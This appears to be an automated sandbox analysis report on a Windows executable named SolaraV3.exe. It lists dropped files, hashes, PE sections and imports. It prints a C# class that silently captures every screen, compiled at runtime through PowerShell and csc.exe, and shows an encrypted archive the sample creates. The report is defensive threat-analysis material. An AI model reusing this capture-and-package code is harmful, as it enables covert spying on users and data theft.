Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1wg00js.dft.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uidiymg4.rdm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2qt1z15.jx2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfbhdf3t.3du.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wt2lezrh.c0x.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt4mjqas.uhw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2jmv5sg.bun.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1002446808542996
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryc+ak7YnqqVfPN5Dlq5J:+RI+ycuZhNK+akSVfPNnqX
MD5:	B924452EC3C619C408C3D05D28887E96
SHA1:	8C739D3B9CEF4D24724713F57357A46229B06BFF
SHA-256:	103D379A7AEF9D51E88CEAFE19BE2942845C9DA12139A672C451BB244AB752B0
SHA-512:	D6D3193119BAF4D160B2F3EE1231BA840BC391F671F52760BBC3F42EDCEE6A86F9B6D6B2D1B64EA43AABE3732D5176DD65B3A8E8A4D324FD25FB6842231B82F2
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.e.3.y.j.i.4.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.e.3.y.j.i.4.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Reputation:	unknown
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (612), with no line terminators
Category:	dropped
Size (bytes):	615
Entropy (8bit):	5.332238181534254
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5cNwiR:p37Lvkmb6KOkqe1xBkrk+ikNZSWZEJZX
MD5:	33C78BF0C2E6639DA4473B5B54B5CE46
SHA1:	007D0C3116B3C88CF479366E66091EABBD6F795D
SHA-256:	C10CFE18818A4171C2FB662F945141597346B4569D1C9C08E0C8119BD102FECE
SHA-512:	51C0126D791A8F900B4EBBA36FF6C0033E1624A2FA2B1A566728B7E91DC9D92B3B26CFD518BD4E7CFAECB45E252433F8A4242CA71D3E90816915C0CCF7C363A3
Malicious:	true
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.0.cs"

C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.155354161392627
Encrypted:	false
SSDEEP:	48:647oEAtf0KhzBU/Xf6mtJm5N0ympW1ulja3Pq:oNz0yme5OychK
MD5:	1A00D1CEE4B1ED5ECD37DF632F118825
SHA1:	F2C6B3982503D7355A8D2E1908E9A1354F29BDED
SHA-256:	FB7884BAF27AB889E693327511078148F078378ED5EC941F505132715550D1E7
SHA-512:	D9D7DB729D2B8D92681A412B153C74464E5968207948F753ED586B1D41CA66A89742EADDF77B7DB85AA62260A758AE663F151B3C0A3C7AFEF99A720A82FDE6F4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (720), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1161
Entropy (8bit):	5.500042621155105
Encrypted:	false
SSDEEP:	24:KoAId3ka6KOkqeFkrDEveKax5DqBVKVrdFAMBJTH:vAkka6NkqeFkrDEveK2DcVKdBJj
MD5:	45A323E38C7FFFCDD407D1AF86B86D4E
SHA1:	16C0C41D68403E19EE58A2CEABEEC8778BE728F6
SHA-256:	1EC49CF0E94AF313A7C5E5059FB7EDEA4D78AA9CD136CA72CA8C8255492E8075
SHA-512:	A38F9ECA204F9350AFC3586D16F6C28E3A87D88E1DAC48AC55A0760693D46DEA0C9E08DC08E8BDEA4B13CAD42011D993D3DBDAEBDE1B420557A74CDB8A5AA401
Malicious:	false
Reputation:	unknown
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which

C:\Users\user\AppData\Local\Temp\w0e8R.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe
File Type:	RAR archive data, v5
Category:	modified
Size (bytes):	725982
Entropy (8bit):	7.9997637765081775
Encrypted:	true
SSDEEP:	12288:phNA+h/ASHmbNiwqiY3axdEgOTIbIPek1KA7+8vES0+zOBVvR7tp4zGeVd1gvZ:y+hY9ptTrNQekZ+8vE+z457tHuDgvZ
MD5:	05417017ACEFF1DA4CC51458C0D86B73
SHA1:	3B53B616ECA869EBAB4B5ABA0550E79CC3BC0FB1
SHA-256:	76B2A12036FAAD3733421679A973540730D5C47406F8A8C9FABC008F13B7D7A9
SHA-512:	CFA8ED6D10F2D211191927AA4C2EA932E1319DAA983B32DE8E9CE8A012EEE3E83B184F9FC57549A4CFFDBEF24BBD335E68BA68C7638FD2E70E904611091DC02E
Malicious:	false
Reputation:	unknown
Preview:	Rar!....V...!......:})..vI..2..Zcn/.1..K.@%.j...=...S...X!.l....#.X6..iU.........,<..<H....k.........^....<.].U.k.-2......c......K..(.R.V.m..{A.....,.....(M.....3z4`.....l.=.j..Z.Qf..].Z..W....y.Q.ox.. Q:.M..]....F.j...T.....N-.".Q........0.'...t./...U].=..Xn-.i..]lg......J.!M3.c....+h1j.N......{..zna....s.BQE...{.s...{%.? T.@.h.b..0.,F-8b..Fk.)z...*_1%.......O/..j..:.i...X..Z.u@...D..O.....~.@....S.W'p.JI.._......d...5.._.-...9...%..c."..k.hiDN..w..hg@~O>.-{.{..C.....9Rv$.....x.~..7.XN...h..t.sN.\|..)Ob$......M(.%.......9T.....]x@......S.I..........S.t%#..^.j~Kf....v2....(...1.........\|...].o..`.g...q...hs..a...~....#..<.".l.re..N,3xg....9n.V...@ .\|.5i...8.O...!..1.e.U.I...!].wy.ri.p%0W..NZO.............`...9....LL...5......U_.....Tz1....@q.....O!..o.$..Z.fu..3.`...C\CTJ .S.(....^.w_.HP..h.9'...~9.4.vN.3>........U...I...6...>&].=d.5Lh#...z..~...W.^.s.......D..H.S.....l2%...).......]MQksC.6@(....)$.k...+^>..m....d..hoG;M..<. .:g..Tq1.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Reputation:	unknown
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.989641490875422
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SolaraV3.exe
File size:	6'315'120 bytes
MD5:	7dd77a8611b56c1ed090293e3ab40f08
SHA1:	1cb4be6453ab5dbeebd8339e0ec4264d6efa611c
SHA256:	5d887dd72893e3bd40b291a1dc3ea2bc94f6d0daf4de318bd1005b57fbe114ca
SHA512:	755ebb1e999ede433f4734552ca91677d33f9309993891435201ed04a539c1537bf80d4c6b45475a8b461ca235a92b27de0f07cfdeb84aaaa467407929523b2e
SSDEEP:	196608:PrumWebTeOjmFwDRxtYSHdK34kdai7bN3m2EQca:KUK2pM9B3Q9w
TLSH:	13563344235209F6E9FB123D8852E565E5B274162780CBCF83B486752F23BE09F3BB56
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc.....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d..

File Icon


Icon Hash:	f0e1d4f0d0e972c7

Static PE Info

General

Entrypoint:	0x14000cdb0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F85A9D [Sat Sep 28 19:35:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	29/09/2021 02:00:00 29/09/2024 01:59:59
Subject Chain	CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version:	3
Thumbprint MD5:	5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1:	3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256:	60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial:	00BFB15001BBF592D4962A7797EA736FA3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F220D75371Ch
dec eax
add esp, 28h
jmp 00007F220D75333Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F220D753AE8h
test eax, eax
je 00007F220D7534E3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F220D7534C7h
dec eax
cmp ecx, eax
je 00007F220D7534D6h
xor eax, eax
dec eax
cmpxchg dword ptr [0003577Ch], ecx
jne 00007F220D7534B0h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F220D7534B9h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F220D7534C9h
mov byte ptr [00035765h], 00000001h
call 00007F220D752C15h
call 00007F220D753F00h
test al, al
jne 00007F220D7534C6h
xor al, al
jmp 00007F220D7534D6h
call 00007F220D760A1Fh
test al, al
jne 00007F220D7534CBh
xor ecx, ecx
call 00007F220D753F10h
jmp 00007F220D7534ACh
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003572Ch], 00000000h
mov ebx, ecx
jne 00007F220D753529h
cmp ecx, 01h
jnbe 00007F220D75352Ch
call 00007F220D753A5Eh
test eax, eax
je 00007F220D7534EAh
test ebx, ebx
jne 00007F220D7534E6h
dec eax
lea ecx, dword ptr [00035716h]
call 00007F220D760812h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca5c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x1b9f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2250	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x603828	0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x63000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f00	0x2a000	a6c3b829cc8eaabb1a474c227e90407f	False	0.5514206659226191	data	6.487493643901088	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a50	0x12c00	6c7f1289cc6447849d99cffb0f1a812f	False	0.5245442708333333	data	5.752825520492837	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2250	0x2400	181312260a85d10a1454ba38901c499b	False	0.4705946180555556	data	5.290347578351011	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x1b9f0	0x1ba00	50cb2e6cd1841ce42257df5140981af1	False	0.974300056561086	data	7.975238468783257	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x63000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x47250	0x3ed	PNG image data, 16 x 16, 8-bit/color RGB, non-interlaced	1.0109452736318407
RT_ICON	0x47640	0x696	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced	1.0065243179122183
RT_ICON	0x47cd8	0x9e5	PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced	1.0043426766679826
RT_ICON	0x486c0	0x1281	PNG image data, 48 x 48, 8-bit/color RGB, non-interlaced	1.002322144817395
RT_ICON	0x49944	0x1cde	PNG image data, 64 x 64, 8-bit/color RGB, non-interlaced	1.00148849797023
RT_ICON	0x4b624	0x5849	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced	1.0007079332772886
RT_ICON	0x50e70	0x1125e	PNG image data, 256 x 256, 8-bit/color RGB, non-interlaced	1.000170847689285
RT_GROUP_ICON	0x620d0	0x68	data	0.7692307692307693
RT_VERSION	0x62138	0x3a8	data	0.46260683760683763
RT_MANIFEST	0x624e0	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, 